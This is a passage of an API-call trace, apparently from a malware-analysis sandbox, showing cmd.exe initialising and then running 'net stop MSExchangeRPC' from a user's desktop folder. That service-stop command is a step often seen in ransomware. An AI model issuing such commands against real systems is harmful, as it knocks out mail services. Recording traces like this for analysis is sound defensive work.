AllocationBase=0x4560000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.538] VirtualQuery (in: lpAddress=0x4560000, lpBuffer=0x465fd0c, dwLength=0x1c | out: lpBuffer=0x465fd0c*(BaseAddress=0x4560000, AllocationBase=0x4560000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.538] VirtualQuery (in: lpAddress=0x4561000, lpBuffer=0x465fd0c, dwLength=0x1c | out: lpBuffer=0x465fd0c*(BaseAddress=0x4561000, AllocationBase=0x4560000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.538] VirtualQuery (in: lpAddress=0x4563000, lpBuffer=0x465fd0c, dwLength=0x1c | out: lpBuffer=0x465fd0c*(BaseAddress=0x4563000, AllocationBase=0x4560000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.538] VirtualQuery (in: lpAddress=0x4660000, lpBuffer=0x465fd0c, dwLength=0x1c | out: lpBuffer=0x465fd0c*(BaseAddress=0x4660000, AllocationBase=0x4660000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0139.538] GetConsoleOutputCP () returned 0x1b5 [0139.539] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0139.539] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0139.539] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.539] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0139.539] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.539] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0139.539] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.539] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0139.539] _get_osfhandle (_FileHandle=0) returned 0x38 [0139.539] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0139.540] _get_osfhandle (_FileHandle=0) returned 0x38 [0139.540] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0139.540] GetEnvironmentStringsW () returned 0x4757d60* [0139.540] FreeEnvironmentStringsA (penv="A") returned 1 [0139.540] GetEnvironmentStringsW () returned 0x4757d60* [0139.540] FreeEnvironmentStringsA (penv="A") returned 1 [0139.540] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x465ecb8 | out: phkResult=0x465ecb8*=0x94) returned 0x0 [0139.540] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x0, lpData=0x465ecc4*=0x33, lpcbData=0x465ecc0*=0x1000) returned 0x2 [0139.540] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x4, lpData=0x465ecc4*=0x1, lpcbData=0x465ecc0*=0x4) returned 0x0 [0139.540] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x0, lpData=0x465ecc4*=0x1, lpcbData=0x465ecc0*=0x1000) returned 0x2 [0139.540] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x4, lpData=0x465ecc4*=0x0, lpcbData=0x465ecc0*=0x4) returned 0x0 [0139.540] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x4, lpData=0x465ecc4*=0x40, lpcbData=0x465ecc0*=0x4) returned 0x0 [0139.540] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x4, lpData=0x465ecc4*=0x40, lpcbData=0x465ecc0*=0x4) returned 0x0 [0139.540] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x0, lpData=0x465ecc4*=0x40, lpcbData=0x465ecc0*=0x1000) returned 0x2 [0139.540] RegCloseKey (hKey=0x94) returned 0x0 [0139.540] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x465ecb8 | out: phkResult=0x465ecb8*=0x94) returned 0x0 [0139.540] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x0, lpData=0x465ecc4*=0x40, lpcbData=0x465ecc0*=0x1000) returned 0x2 [0139.540] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x4, lpData=0x465ecc4*=0x1, lpcbData=0x465ecc0*=0x4) returned 0x0 [0139.540] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x0, lpData=0x465ecc4*=0x1, lpcbData=0x465ecc0*=0x1000) returned 0x2 [0139.541] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x4, lpData=0x465ecc4*=0x0, lpcbData=0x465ecc0*=0x4) returned 0x0 [0139.541] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x4, lpData=0x465ecc4*=0x9, lpcbData=0x465ecc0*=0x4) returned 0x0 [0139.541] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x4, lpData=0x465ecc4*=0x9, lpcbData=0x465ecc0*=0x4) returned 0x0 [0139.541] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x465ecbc, lpData=0x465ecc4, lpcbData=0x465ecc0*=0x1000 | out: lpType=0x465ecbc*=0x0, lpData=0x465ecc4*=0x9, lpcbData=0x465ecc0*=0x1000) returned 0x2 [0139.541] RegCloseKey (hKey=0x94) returned 0x0 [0139.541] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983c [0139.541] srand (_Seed=0x5ad2983c) [0139.541] GetCommandLineW () returned="/c net stop MSExchangeRPC" [0139.541] GetCommandLineW () returned="/c net stop MSExchangeRPC" [0139.541] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0139.541] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4759cb8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0139.541] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0139.541] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.541] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.541] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.541] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.541] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.541] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.541] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.541] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.541] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.541] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.541] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.541] GetEnvironmentStringsW () returned 0x4757d60* [0139.542] FreeEnvironmentStringsA (penv="A") returned 1 [0139.542] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.542] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.542] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.542] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.542] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.542] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.542] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.542] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.542] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.542] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.542] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x465fa90 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0139.542] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x465fa90, lpFilePart=0x465fa88 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x465fa88*="Desktop") returned 0x1d [0139.542] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0139.542] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x465f810 | out: lpFindFileData=0x465f810) returned 0x47505c8 [0139.542] FindClose (in: hFindFile=0x47505c8 | out: hFindFile=0x47505c8) returned 1 [0139.542] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x465f810 | out: lpFindFileData=0x465f810) returned 0x47505c8 [0139.542] FindClose (in: hFindFile=0x47505c8 | out: hFindFile=0x47505c8) returned 1 [0139.542] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0139.542] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x465f810 | out: lpFindFileData=0x465f810) returned 0x47505c8 [0139.542] FindClose (in: hFindFile=0x47505c8 | out: hFindFile=0x47505c8) returned 1 [0139.542] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0139.543] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0139.543] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0139.543] GetEnvironmentStringsW () returned 0x4757d60* [0139.543] FreeEnvironmentStringsA (penv="=") returned 1 [0139.543] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0139.543] GetConsoleOutputCP () returned 0x1b5 [0139.543] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0139.543] GetUserDefaultLCID () returned 0x409 [0139.543] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x465fbc0, cchData=128 | out: lpLCData="0") returned 2 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x465fbc0, cchData=128 | out: lpLCData="0") returned 2 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x465fbc0, cchData=128 | out: lpLCData="1") returned 2 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0139.544] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0139.544] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.545] GetConsoleTitleW (in: lpConsoleTitle=0x475a9e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.545] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0139.545] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0139.545] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0139.546] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0139.546] _wcsicmp (_String1="net", _String2=")") returned 69 [0139.546] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0139.546] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0139.546] _wcsicmp (_String1="IF", _String2="net") returned -5 [0139.546] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0139.546] _wcsicmp (_String1="REM", _String2="net") returned 4 [0139.546] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0139.547] GetConsoleTitleW (in: lpConsoleTitle=0x465f8a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.547] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0139.547] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0139.547] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0139.547] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0139.547] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0139.547] _wcsicmp (_String1="net", _String2="CD") returned 11 [0139.547] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0139.547] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0139.547] _wcsicmp (_String1="net", _String2="REN") returned -4 [0139.547] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0139.547] _wcsicmp (_String1="net", _String2="SET") returned -5 [0139.547] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0139.547] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0139.547] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0139.547] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0139.547] _wcsicmp (_String1="net", _String2="MD") returned 1 [0139.547] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0139.547] _wcsicmp (_String1="net", _String2="RD") returned -4 [0139.547] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0139.547] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0139.547] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0139.547] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0139.547] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0139.547] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0139.547] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0139.547] _wcsicmp (_String1="net", _String2="VER") returned -8 [0139.548] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0139.548] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0139.548] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0139.548] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0139.548] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0139.548] _wcsicmp (_String1="net", _String2="START") returned -5 [0139.548] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0139.548] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0139.548] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0139.548] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0139.548] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0139.548] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0139.548] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0139.548] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0139.548] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0139.548] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0139.548] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0139.548] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0139.548] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0139.548] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0139.548] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0139.548] _wcsicmp (_String1="net", _String2="CD") returned 11 [0139.548] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0139.548] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0139.548] _wcsicmp (_String1="net", _String2="REN") returned -4 [0139.548] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0139.548] _wcsicmp (_String1="net", _String2="SET") returned -5 [0139.548] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0139.548] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0139.548] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0139.548] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0139.548] _wcsicmp (_String1="net", _String2="MD") returned 1 [0139.548] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0139.548] _wcsicmp (_String1="net", _String2="RD") returned -4 [0139.548] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0139.548] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0139.548] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0139.548] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0139.548] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0139.548] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0139.548] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0139.548] _wcsicmp (_String1="net", _String2="VER") returned -8 [0139.548] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0139.548] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0139.548] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0139.548] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0139.548] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0139.548] _wcsicmp (_String1="net", _String2="START") returned -5 [0139.548] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0139.548] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0139.548] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0139.548] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0139.548] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0139.548] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0139.548] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0139.549] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0139.549] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0139.549] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0139.549] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0139.549] _wcsicmp (_String1="net", _String2="IF") returned 5 [0139.549] _wcsicmp (_String1="net", _String2="REM") returned -4 [0139.549] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0139.549] SetErrorMode (uMode=0x0) returned 0x0 [0139.549] SetErrorMode (uMode=0x1) returned 0x0 [0139.549] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47505d0, lpFilePart=0x465f3b4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x465f3b4*="Desktop") returned 0x1d [0139.549] SetErrorMode (uMode=0x0) returned 0x1 [0139.549] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0139.549] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0139.557] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0139.557] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0139.557] GetConsoleTitleW (in: lpConsoleTitle=0x465f634, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.557] InitializeProcThreadAttributeList (in: lpAttributeList=0x465f560, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x465f544 | out: lpAttributeList=0x465f560, lpSize=0x465f544) returned 1 [0139.557] UpdateProcThreadAttribute (in: lpAttributeList=0x465f560, dwFlags=0x0, Attribute=0x60001, lpValue=0x465f54c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x465f560, lpPreviousValue=0x0) returned 1 [0139.557] GetStartupInfoW (in: lpStartupInfo=0x465f598 | out: lpStartupInfo=0x465f598*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.557] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0139.558] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0139.558] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0139.559] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeRPC", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x465f4e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeRPC", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x465f534 | out: lpCommandLine="net stop MSExchangeRPC", lpProcessInformation=0x465f534*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x9a4, dwThreadId=0xc80)) returned 1 [0139.565] CloseHandle (hObject=0xa4) returned 1 [0139.565] 